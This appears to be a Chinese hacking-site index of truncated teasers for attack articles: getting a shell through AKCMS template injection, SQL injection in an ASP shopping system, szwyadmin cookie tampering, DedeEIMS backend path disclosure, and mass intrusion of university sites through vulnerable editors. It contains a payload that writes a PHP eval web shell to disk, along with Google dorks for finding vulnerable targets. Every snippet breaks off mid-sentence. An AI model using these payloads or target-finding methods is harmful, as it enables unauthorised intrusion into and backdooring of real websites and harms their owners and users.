-
AKCMS注入及后台拿shell漏洞
模板中写入以下内 <{php}>fputs(fopen(“./0x80c.php”,”w”),”<?eval($_POST[0x80c]);?>&rdqu...
-
无忧购物系统ASP专业版注入漏洞
谷歌关键字:inurl:views.asp?hw_id=注入点:www.hack1990.com/views.asp?hw_id=512POST 注入漏洞...
-
szwyadmin程序漏洞拿shell
先我们在Google中搜索关键词关键字:inurl:szwyadmin/login.asp任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:代码:javascript:alert(document.cookie="ad...
-
DedeEIMS v1.1暴后台路径
includedialogconfig.php//检验用户登录状态 $cuserLogin = new userLogin(); if($cuserLogin->getUserID()==-1) { if($cuserLogin-&...
-
批量入侵高校站漏洞EXP
高校站基本上用的是改版的cms,而cms里必定有编辑器。目前的编辑器漏洞很少是比较安全的,但是高校站不一样。一个高校的网站必定是上了年岁的除非新成立的大学新成立的学院,这样,cms里有有漏洞的编辑器的概率很大因此,我们可以通过批量扫描编辑器...
